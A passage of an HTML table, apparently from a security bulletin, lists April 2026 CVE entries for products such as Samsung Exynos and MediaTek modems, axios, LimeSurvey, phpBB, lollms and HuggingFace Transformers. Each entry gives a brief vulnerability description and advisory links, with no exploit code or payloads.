    <td><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54328/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54328/</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Processor &amp; Wearable Processor Exynos</td>
    <td>An issue was discovered in RRC in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Improper memory initialization results in an illegal memory access, causing a system crash via a malformed RRCReconfiguration message.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-57835" target="_blank" rel="noopener">CVE-2025-57835</a></td>
    <td><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-57835/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-57835/</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Processor &amp; Wearable Processor Exynos</td>
    <td>An issue was discovered in L2 in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Incorrect handling of LTE MAC packets containing many MAC Control Elements (CEs) leads to baseband crashes.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-58349" target="_blank" rel="noopener">CVE-2025-58349</a></td>
    <td><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-58349/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-58349/</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Processor &amp; Wearable Processor Exynos</td>
    <td>An issue was discovered in USIM in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Improper handling of SIM card proactive commands leads to a Denial of Service.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-59440" target="_blank" rel="noopener">CVE-2025-59440</a></td>
    <td><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-59440/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-59440/</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">n/a--n/a</td>
    <td>An open redirect in Ascertia SigningHub User v10.0 allows attackers to redirect users to a malicious site via a crafted URL.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-61166" target="_blank" rel="noopener">CVE-2025-61166</a></td>
    <td><a href="https://linkedin.com/in/thakur-nikhil" target="_blank" rel="noopener">https://linkedin.com/in/thakur-nikhil</a><br><a href="https://medium.com/@rajput.thakur/malicious-open-redirection-cve-2025-61166-bf5d708cd241" target="_blank" rel="noopener">https://medium.com/@rajput.thakur/malicious-open-redirection-cve-2025-61166-bf5d708cd241</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">Apache Software Foundation--Apache DolphinScheduler</td>
    <td>An Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists in Apache DolphinScheduler. This vulnerability may allow unauthorized actors to access sensitive information, including database credentials. This issue affects Apache DolphinScheduler versions 3.1.*. Users are recommended to upgrade to version ≥ 3.2.0 if using 3.1.x. As a temporary workaround, users who cannot upgrade immediately may restrict the exposed management endpoints by setting the following environment variable: ```MANAGEMENT_ENDPOINTS_WEB_EXPOSURE_INCLUDE=health,metrics,prometheus```. Alternatively, add the following configuration to the application.yaml file:<br>```<br>management:<br>&nbsp;&nbsp;endpoints:<br>&nbsp;&nbsp;&nbsp;&nbsp;web:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exposure:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;include: health,metrics,prometheus<br>```<br>This issue has been reported as CVE-2023-48796: https://cveprocess.apache.org/cve5/CVE-2023-48796</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-62188" target="_blank" rel="noopener">CVE-2025-62188</a></td>
    <td><a href="https://lists.apache.org/thread/ffrmkcwgr2lcz0f5nnnyswhpn3fytsvo" target="_blank" rel="noopener">https://lists.apache.org/thread/ffrmkcwgr2lcz0f5nnnyswhpn3fytsvo</a><br><a href="https://www.cve.org/CVERecord?id=CVE-2023-48796" target="_blank" rel="noopener">https://www.cve.org/CVERecord?id=CVE-2023-48796</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">axios--axios</td>
    <td>Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-62718" target="_blank" rel="noopener">CVE-2025-62718</a></td>
    <td><a href="https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5" target="_blank" rel="noopener">https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5</a><br><a href="https://github.com/axios/axios/pull/10661" target="_blank" rel="noopener">https://github.com/axios/axios/pull/10661</a><br><a href="https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df" target="_blank" rel="noopener">https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df</a><br><a href="https://datatracker.ietf.org/doc/html/rfc1034#section-3.1" target="_blank" rel="noopener">https://datatracker.ietf.org/doc/html/rfc1034#section-3.1</a><br><a href="https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2" target="_blank" rel="noopener">https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2</a><br><a href="https://github.com/axios/axios/releases/tag/v1.15.0" target="_blank" rel="noopener">https://github.com/axios/axios/releases/tag/v1.15.0</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Processor &amp; Wearable Processor Exynos</td>
    <td>An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. An out-of-bounds write occurs due to a mismatch between the TP-UDHI and UDL values when processing an SMS TP-UD packet.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-62818" target="_blank" rel="noopener">CVE-2025-62818</a></td>
    <td><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-62818/" target="_blank" rel="noopener">https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-62818/</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">n/a--LimeSurvey</td>
    <td>A Reflected Cross-Site Scripting (XSS) affects LimeSurvey versions prior to 6.15.11+250909, due to the lack of validation of the gid parameter in the getInstance() function in application/models/QuestionCreate.php. This allows an attacker to craft a malicious URL and compromise the logged-in user.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-63238" target="_blank" rel="noopener">CVE-2025-63238</a></td>
    <td><a href="https://github.com/LimeSurvey/LimeSurvey/commit/80769a677dc82ddb1fcced4af19bd959d583208d" target="_blank" rel="noopener">https://github.com/LimeSurvey/LimeSurvey/commit/80769a677dc82ddb1fcced4af19bd959d583208d</a><br><a href="https://gist.github.com/masquerad3r/f913ab479e8de2ad71987ef98a088fb5" target="_blank" rel="noopener">https://gist.github.com/masquerad3r/f913ab479e8de2ad71987ef98a088fb5</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">n/a--n/a</td>
    <td>An issue in JXL 9 Inch Car Android Double Din Player Android v12.0 allows attackers to force the infotainment system into accepting falsified GPS signals as legitimate, resulting in the device reporting an incorrect or static location.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-69515" target="_blank" rel="noopener">CVE-2025-69515</a></td>
    <td><a href="http://jxl.com" target="_blank" rel="noopener">http://jxl.com</a><br><a href="https://github.com/thorat-shubham/JXL_Infotainment_CVE-2025-69515/blob/main/README.md" target="_blank" rel="noopener">https://github.com/thorat-shubham/JXL_Infotainment_CVE-2025-69515/blob/main/README.md</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">n/a--n/a</td>
    <td>An issue was discovered in Kiamo before 8.4 allowing authenticated administrative attackers to execute arbitrary PHP code on the server.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-70364" target="_blank" rel="noopener">CVE-2025-70364</a></td>
    <td><a href="http://kiamo.com" target="_blank" rel="noopener">http://kiamo.com</a><br><a href="https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/2025-12-23-CVE-2025-70364-Kiamo.md" target="_blank" rel="noopener">https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/2025-12-23-CVE-2025-70364-Kiamo.md</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">Kiamo[.]com -- Kiamo</td>
    <td>A stored cross-site scripting (XSS) vulnerability exists in Kiamo before 8.4 due to improper output encoding of user-supplied input in administrative interfaces. An authenticated administrative user can inject arbitrary JavaScript code that is executed in the browser of users viewing the affected pages.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-70365" target="_blank" rel="noopener">CVE-2025-70365</a></td>
    <td><a href="http://kiamo.com" target="_blank" rel="noopener">http://kiamo.com</a><br><a href="https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/2025-12-23-CVE-2025-70365-Kiamo.md" target="_blank" rel="noopener">https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/2025-12-23-CVE-2025-70365-Kiamo.md</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">n/a--Limesurvey</td>
    <td>Cross Site Scripting vulnerability in Limesurvey v.6.15.20+251021 allows a remote attacker to execute arbitrary code via the Box[title] and box[url] parameters.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-70797" target="_blank" rel="noopener">CVE-2025-70797</a></td>
    <td><a href="https://gist.github.com/masquerad3r/772ddbfbd9fd95754f4873bcb202146d" target="_blank" rel="noopener">https://gist.github.com/masquerad3r/772ddbfbd9fd95754f4873bcb202146d</a><br><a href="https://github.com/LimeSurvey/LimeSurvey/pull/4356" target="_blank" rel="noopener">https://github.com/LimeSurvey/LimeSurvey/pull/4356</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">n/a--n/a</td>
    <td>Cross Site Request Forgery vulnerability in phpBB phpbb3 v.3.3.15 allows a local attacker to execute arbitrary code via the login function and the authentication mechanism.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-70810" target="_blank" rel="noopener">CVE-2025-70810</a></td>
    <td><a href="https://github.com/ariefibis" target="_blank" rel="noopener">https://github.com/ariefibis</a><br><a href="https://www.linkedin.com/in/mohammed-a-6a2548112/" target="_blank" rel="noopener">https://www.linkedin.com/in/mohammed-a-6a2548112/</a><br><a href="https://gist.github.com/ariefibis/80e306765c23d6fac1584dbb76822e30" target="_blank" rel="noopener">https://gist.github.com/ariefibis/80e306765c23d6fac1584dbb76822e30</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">n/a--n/a</td>
    <td>Cross Site Request Forgery vulnerability in phpBB phpbb3 v.3.3.15 allows a local attacker to execute arbitrary code via the Admin Control Panel icon management functionality.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-70811" target="_blank" rel="noopener">CVE-2025-70811</a></td>
    <td><a href="https://github.com/ariefibis" target="_blank" rel="noopener">https://github.com/ariefibis</a><br><a href="https://www.linkedin.com/in/mohammed-a-6a2548112/" target="_blank" rel="noopener">https://www.linkedin.com/in/mohammed-a-6a2548112/</a><br><a href="https://github.com/ariefibis/PHPBB/security/advisories/GHSA-56pv-xg3w-6822" target="_blank" rel="noopener">https://github.com/ariefibis/PHPBB/security/advisories/GHSA-56pv-xg3w-6822</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">n/a--Yaffa</td>
    <td>yaffa v2.0.0 is vulnerable to Cross Site Scripting (XSS). An attacker can inject malicious JavaScript into the "Add Account Group" function on the account-group page, allowing execution of arbitrary script in the context of users who view the affected page.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-70844" target="_blank" rel="noopener">CVE-2025-70844</a></td>
    <td><a href="https://github.com/kantorge/yaffa" target="_blank" rel="noopener">https://github.com/kantorge/yaffa</a><br><a href="https://github.com/J4cky1028/vulnerability-research/tree/main/CVE-2025-70844" target="_blank" rel="noopener">https://github.com/J4cky1028/vulnerability-research/tree/main/CVE-2025-70844</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">n/a--n/a</td>
    <td>Dual DHCP DNS Server 8.01 improperly accepts and caches UDP DNS responses without validating that the response originates from a legitimate configured upstream DNS server. The implementation matches responses primarily by TXID and inserts results into the cache, enabling a remote attacker to inject forged responses and poison the DNS cache, potentially redirecting victims to attacker-controlled destinations.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-71058" target="_blank" rel="noopener">CVE-2025-71058</a></td>
    <td><a href="https://sourceforge.net/projects/dhcp-dns-server/" target="_blank" rel="noopener">https://sourceforge.net/projects/dhcp-dns-server/</a><br><a href="https://github.com/FPokerFace/Security-Advisory/tree/main/CVE-2025-71058" target="_blank" rel="noopener">https://github.com/FPokerFace/Security-Advisory/tree/main/CVE-2025-71058</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">Google--Android</td>
    <td>In onHeaderDecoded of LocalImageResolver.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-0049" target="_blank" rel="noopener">CVE-2026-0049</a></td>
    <td><a href="https://source.android.com/docs/security/bulletin/2026/2026-04-01" target="_blank" rel="noopener">https://source.android.com/docs/security/bulletin/2026/2026-04-01</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">Pegasystems--Pega Robot Studio</td>
    <td>An arbitrary file-write vulnerability in Pega Browser Extension (PBE) affects Pega Robotic Automation version 22.1 or R25 users who are running automations that work with Google Chrome or Microsoft Edge. A bad actor could create a website that includes malicious code. The vulnerability could occur if a Robot Runtime user navigates to the malicious website.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1078" target="_blank" rel="noopener">CVE-2026-1078</a></td>
    <td><a href="https://support.pega.com/support-doc/pega-security-advisory-a26-vulnerability-remediation-note" target="_blank" rel="noopener">https://support.pega.com/support-doc/pega-security-advisory-a26-vulnerability-remediation-note</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">Pegasystems--Pega Browser Extension (PBE)</td>
    <td>A native messaging host vulnerability in Pega Browser Extension (PBE) affects users of all versions of Pega Robotic Automation who have installed Pega Browser Extension. A bad actor could create a website that contains malicious code that targets PBE. The vulnerability could occur if a user navigates to this website. The malicious website could then present an unexpected message box.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1079" target="_blank" rel="noopener">CVE-2026-1079</a></td>
    <td><a href="https://support.pega.com/support-doc/pega-security-advisory-a26-vulnerability-remediation-note" target="_blank" rel="noopener">https://support.pega.com/support-doc/pega-security-advisory-a26-vulnerability-remediation-note</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">parisneo--parisneo/lollms</td>
    <td>In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens (JWT). This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the secret key is obtained, the attacker can forge administrative tokens by modifying the JWT payload and resigning it with the cracked secret. This enables unauthorized users to escalate privileges, impersonate the administrator, and gain access to restricted endpoints. The issue is resolved in version 2.2.0.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1114" target="_blank" rel="noopener">CVE-2026-1114</a></td>
    <td><a href="https://huntr.com/bounties/608b2a3b-2225-438e-9e61-ffbfdec2ed89" target="_blank" rel="noopener">https://huntr.com/bounties/608b2a3b-2225-438e-9e61-ffbfdec2ed89</a><br><a href="https://github.com/parisneo/lollms/commit/a3b2b82b84d537a9da63e63a370a6a8ad55fed34" target="_blank" rel="noopener">https://github.com/parisneo/lollms/commit/a3b2b82b84d537a9da63e63a370a6a8ad55fed34</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">parisneo--parisneo/lollms</td>
    <td>A Stored Cross-Site Scripting (XSS) vulnerability was identified in the social feature of parisneo/lollms, affecting the latest version prior to 2.2.0. The vulnerability exists in the `create_post` function within `backend/routers/social/__init__.py`, where user-provided content is directly assigned to the `DBPost` model without sanitization. This allows attackers to inject and store malicious JavaScript, which is executed in the browsers of users viewing the Home Feed, including administrators. This can lead to account takeover, session hijacking, and wormable attacks. The issue is resolved in version 2.2.0.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1115" target="_blank" rel="noopener">CVE-2026-1115</a></td>
    <td><a href="https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa" target="_blank" rel="noopener">https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa</a><br><a href="https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a" target="_blank" rel="noopener">https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">parisneo--parisneo/lollms</td>
    <td>A Cross-site Scripting (XSS) vulnerability was identified in the `from_dict` method of the `AppLollmsMessage` class in parisneo/lollms prior to version 2.2.0. The vulnerability arises from the lack of sanitization or HTML encoding of the `content` field when deserializing user-provided data. This allows an attacker to inject malicious HTML or JavaScript payloads, which can be executed in the context of another user's browser. Exploitation of this vulnerability can lead to account takeover, session hijacking, or wormable attacks.</td>
    <td>2026-04-12</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1116" target="_blank" rel="noopener">CVE-2026-1116</a></td>
    <td><a href="https://huntr.com/bounties/d3d076a7-2a51-4e07-8d0e-91e28e76788e" target="_blank" rel="noopener">https://huntr.com/bounties/d3d076a7-2a51-4e07-8d0e-91e28e76788e</a><br><a href="https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a" target="_blank" rel="noopener">https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">parisneo--parisneo/lollms</td>
    <td>An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject requests after a period of inactivity and the excessively long default session duration of 31 days. The vulnerability enables an attacker to maintain persistent access to a compromised account, even after the victim resets their password.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1163" target="_blank" rel="noopener">CVE-2026-1163</a></td>
    <td><a href="https://huntr.com/bounties/abe2d1c4-c21c-4608-8a8e-274565246a8b" target="_blank" rel="noopener">https://huntr.com/bounties/abe2d1c4-c21c-4608-8a8e-274565246a8b</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">Python Software Foundation--CPython</td>
    <td>CR/LF bytes were not rejected by HTTP client proxy tunnel headers or host.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1502" target="_blank" rel="noopener">CVE-2026-1502</a></td>
    <td><a href="https://github.com/python/cpython/pull/146212" target="_blank" rel="noopener">https://github.com/python/cpython/pull/146212</a><br><a href="https://github.com/python/cpython/issues/146211" target="_blank" rel="noopener">https://github.com/python/cpython/issues/146211</a><br><a href="https://mail.python.org/archives/list/security-announce@python.org/thread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/" target="_blank" rel="noopener">https://mail.python.org/archives/list/security-announce@python.org/thread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/</a><br><a href="https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69" target="_blank" rel="noopener">https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69</a><br>&nbsp;</td>
    </tr>
    <tr>
    <td class="vendor-product">huggingface--huggingface/transformers</td>
    <td>A vulnerability in the HuggingFace Transformers library, specifically in the `Trainer` class, allows for arbitrary code execution. The `_load_rng_state()` method in `src/transformers/trainer.py` at line 3059 calls `torch.load()` without the `weights_only=True` parameter. This issue affects all versions of the library supporting `torch&gt;=2.2` when used with PyTorch versions below 2.6, as the `safe_globals()` context manager provides no protection in these versions. An attacker can exploit this vulnerability by supplying a malicious checkpoint file, such as `rng_state.pth`, which can execute arbitrary code when loaded. The issue is resolved in version v5.0.0rc3.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1839" target="_blank" rel="noopener">CVE-2026-1839</a></td>
    <td><a href="https://huntr.com/bounties/3c77bb97-e493-493d-9a88-c57f5c536485" target="_blank" rel="noopener">https://huntr.com/bounties/3c77bb97-e493-493d-9a88-c57f5c536485</a><br><a href="https://github.com/huggingface/transformers/commit/03c8082ba4594c9b8d6fe190ca9bed0e5f8ca396" target="_blank" rel="noopener">https://github.com/huggingface/transformers/commit/03c8082ba4594c9b8d6fe190ca9bed0e5f8ca396</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Unknown--Link Whisper Free</td>
    <td>The Link Whisper Free WordPress plugin before 0.9.1 has a publicly accessible REST endpoint that allows unauthenticated settings updates.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1900" target="_blank" rel="noopener">CVE-2026-1900</a></td>
    <td><a href="https://wpscan.com/vulnerability/dc10b627-7981-4c53-bc9d-e87418f3fcfc/" target="_blank" rel="noopener">https://wpscan.com/vulnerability/dc10b627-7981-4c53-bc9d-e87418f3fcfc/</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">MediaTek, Inc.--MediaTek chipset</td>
    <td>In Modem, there is a possible system crash due to a logic error. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01106496; Issue ID: MSV-4467.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-20431" target="_blank" rel="noopener">CVE-2026-20431</a></td>
    <td><a href="https://corp.mediatek.com/product-security-bulletin/April-2026" target="_blank" rel="noopener">https://corp.mediatek.com/product-security-bulletin/April-2026</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">MediaTek, Inc.--MediaTek chipset</td>
    <td>In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01406170; Issue ID: MSV-4461.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-20432" target="_blank" rel="noopener">CVE-2026-20432</a></td>
    <td><a href="https://corp.mediatek.com/product-security-bulletin/April-2026" target="_blank" rel="noopener">https://corp.mediatek.com/product-security-bulletin/April-2026</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">MediaTek, Inc.--MediaTek chipset</td>
    <td>In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: MOLY01088681; Issue ID: MSV-4460.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-20433" target="_blank" rel="noopener">CVE-2026-20433</a></td>
    <td><a href="https://corp.mediatek.com/product-security-bulletin/April-2026" target="_blank" rel="noopener">https://corp.mediatek.com/product-security-bulletin/April-2026</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">MediaTek, Inc.--MediaTek chipset</td>
    <td>In sec boot, there is a possible out of bounds write due to an integer overflow. This could lead to local denial of service, if an attacker has physical access to the device, with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09963054; Issue ID: MSV-3899.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-20446" target="_blank" rel="noopener">CVE-2026-20446</a></td>
    <td><a href="https://corp.mediatek.com/product-security-bulletin/April-2026" target="_blank" rel="noopener">https://corp.mediatek.com/product-security-bulletin/April-2026</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Rocket.Chat--Rocket.Chat</td>
    <td>An open redirect vulnerability in Rocket.Chat versions prior to 8.4.0 allows users to be redirected to arbitrary URLs by manipulating parameters within a SAML endpoint.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-22560" target="_blank" rel="noopener">CVE-2026-22560</a></td>
    <td><a href="https://hackerone.com/reports/3418031" target="_blank" rel="noopener">https://hackerone.com/reports/3418031</a><br><a href="https://github.com/RocketChat/Rocket.Chat/pull/38994" target="_blank" rel="noopener">https://github.com/RocketChat/Rocket.Chat/pull/38994</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">The Wikimedia Foundation--Mediawiki - Wikilove Extension</td>
    <td>Improper neutralization of alternate XSS syntax vulnerability in The Wikimedia Foundation Mediawiki - Wikilove Extension allows Cross-Site Scripting (XSS). The issue has been remediated on the `master` branch, and in the release branches for MediaWiki versions 1.43, 1.44, and 1.45.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-22711" target="_blank" rel="noopener">CVE-2026-22711</a></td>
    <td><a href="https://phabricator.wikimedia.org/T416502" target="_blank" rel="noopener">https://phabricator.wikimedia.org/T416502</a><br><a href="https://gerrit.wikimedia.org/r/q/Iab86209478a044504f5a6aea0d8c3d14f21c48b3" target="_blank" rel="noopener">https://gerrit.wikimedia.org/r/q/Iab86209478a044504f5a6aea0d8c3d14f21c48b3</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">OpenPLC_V3--OpenPLC_V3</td>
    <td>OpenPLC_V3 is vulnerable to an Initialization of a Resource with an Insecure Default vulnerability which could allow an attacker to gain access to the system by bypassing authentication via an API.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-28205" target="_blank" rel="noopener">CVE-2026-28205</a></td>
